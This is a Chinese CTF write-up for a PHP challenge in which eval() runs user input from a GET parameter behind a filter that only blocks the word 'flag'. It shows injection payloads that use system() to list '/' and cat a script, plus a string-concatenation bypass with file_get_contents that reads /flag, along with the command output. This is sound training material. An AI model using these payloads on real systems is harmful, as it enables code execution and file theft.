当前位置: 首页 > news >正文

CTF--PhP Web解题(走入CTF)

news 来源:原创 2025/6/22 6:10:13

前情提要

分享有趣CTF题目,记录学习过程

题目(带注释,方便理解)

<?php
// 开启PHP源代码高亮显示,输出当前文件内容(用于调试/展示)
highlight_file(__FILE__);// 关闭所有错误报告,防止敏感信息泄露
error_reporting(0);// 获取GET请求参数'c'的值,用户可通过URL传入代码(如?c=phpinfo())
$c = $_GET['c'];// 检查输入$c中是否包含"flag"字符串(不区分大小写)
// 如果不存在"flag"则执行eval,否则跳过(安全过滤)
if(!preg_match("/flag/i",$c)){// 执行用户输入的PHP代码(存在代码注入漏洞)eval($c);
}// PHP结束标记
?>

题目介绍

此代码:

  1. 高危函数

    • eval():可执行任意代码,是漏洞根源

    • $_GET:直接接收用户输入,未做过滤

  2. 脆弱防护

    • 仅过滤"flag"关键词,可通过拼接/编码绕过

    • 无其他安全限制(如函数黑名单、长度限制等)

典型的代码注入漏洞。eval() 函数执行通过 c 参数传递的任意 PHP 代码

只有一个限制 - 代码不能包含单词 “flag”。

目标

获取隐藏在服务器上的真实 flag(通常格式为 flag{xxx}

初步思考解决方法

  1. 使用其他方法读取文件 

    • scandir() 列出目录内容

    • file_get_contents() 或 readfile() 替换为我们发现的文件名

  2. 绕过 “flag” 限制 

    • 使用字符串连接:fl 银

    • 使用十六进制/八进制编码:\x66\x6c\x61\x67

    • 使用 base64 编码

  3. 有效负载示例 

    • 列出文件: ?c=print_r(scandir('.'));

    • 读取文件: ?c=echo file_get_contents('fl'.'ag.php');

    • 系统命令: ?c=system('ls');

规划流程图

正式解题

1.信息采集

因为是小型比赛,系统不严格,获取信息较为方便。

我们可以通过下面命令查看详细的目录结构

网站网址/?c=system('ls -la /');

作者使用上述方式找到的文件目录

total 76 drwxr-xr-x 1 root root 4096 Jun 21 14:06 . drwxr-xr-x 1 root root 4096 Jun 21 14:06 .. -rwxr-xr-x 1 root root 0 Jun 21 14:06 .dockerenv drwxr-xr-x 1 root root 4096 Jan 31 2019 bin drwxr-xr-x 5 root root 320 Jun 21 14:06 dev drwxr-xr-x 1 root root 4096 Jun 21 14:06 etc -rw-r--r-- 1 root root 43 Jun 21 14:06 flag -rwxr-xr-x 1 root root 78 Jun 18 12:00 flag.sh drwxr-xr-x 1 root root 4096 Jan 31 2019 home drwxr-xr-x 1 root root 4096 Oct 18 2019 lib drwxr-xr-x 5 root root 4096 Jan 30 2019 media drwxr-xr-x 2 root root 4096 Jan 30 2019 mnt dr-xr-xr-x 230 root root 0 Jun 21 14:06 proc drwx------ 1 root root 4096 Jan 31 2019 root drwxr-xr-x 1 root root 4096 Oct 18 2019 run drwxr-xr-x 1 root root 4096 Oct 18 2019 sbin drwxr-xr-x 2 root root 4096 Jan 30 2019 srv dr-xr-xr-x 13 root root 0 Jun 21 14:06 sys drwxrwxrwt 1 root root 4096 Oct 18 2019 tmp drwxr-xr-x 1 root root 4096 Oct 18 2019 usr drwxr-xr-x 1 root root 4096 Jan 31 2019 var

2.定点爆破

根据上述获取的目录结构,找寻带有Flag的文件名称(如果文件过多,可以将所有文件给ai,让ai帮忙找)

很明显上面出现了flag与flag.sh两个关键文件

  1. /flag - 普通文件

  2. /flag.sh - 可执行脚本

3.文件分析

查看flag.sh脚本内容

网站网址/?c=system('cat /fla*.sh');

不出意外直接碰壁,得到了

#!/bin/sh sed -i "s/flag{fakeflag}/$GZCTF_FLAG/" /flag export GZCTF_FLAG=""

上述内容表示flag.sh 会将环境变量 $GZCTF_FLAG 的真实值替换到 /flag 文件中,然后清空该环境变量。

 

4.多种方法集中尝试

使用PHP函数绕过关键词过滤与文件读取限制

网站网址/?c=echo file_get_contents('/fl'.'ag');

得到了 flag{480cb6ab-d6b3-4625-98a3-5a1e45f4ed46}

不出意外成功解题。

小结

看流程图就行了,采用的php函数绕过限制,,成功输出flag。

相关文章:

  • [C++] STL数据结构小结
  • access和excel用vba进行辅助办公软件开发
  • c++26新功能—hive容器
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 03(题目+回答)
  • WebeServer实现:学到了哪些东西
  • STM32F103_LL库+寄存器学习笔记12.3 - 串口DMA高效收发实战3:支持多实例化的版本
  • 如何在MacOS系统和Windows系统安装节点小宝远程工具
  • Java-52 深入浅出 Tomcat SSL工作原理 性能优化 参数配置 JVM优化
  • 爬虫获取数据:selenium的应用
  • Docker简单介绍与使用以及下载对应镜像(项目前置)
  • CVE-2024-6387漏洞、CVE-2025-26465漏洞、CVE-2025-26466漏洞 一口气全解决
  • 【JS-4.3-鼠标常用事件】深入理解DOM鼠标事件:全面指南与最佳实践
  • FPGA四十年创新:因仿真加速而生,AI加速而盛!
  • 股票账户的管理和交易
  • 车载电子电器架构 --- 法律和标准对电子电气架构的影响
  • Mac电脑-Markdown编辑器-Typora
  • 数据库part3---表关联、索引、视图
  • 深入浅出:Go语言中的Cookie、Session和Token认证机制
  • Vibe Coding - 进阶 Cursor Rules
  • gRPC 框架面试题精选及参考答案
  • 手机免费制作ppt/陕西网络营销优化公司
  • 潜力的网站设计制作/营销软文小短文
  • 黄页88网站关键词怎么做/优化公司排行榜
  • 计算机网站开发论文参考文献/营销型企业网站建设步骤
  • 招商局网站建设管理总结/tool站长工具
  • 专门做特价的网站/搜索引擎优化面对哪些困境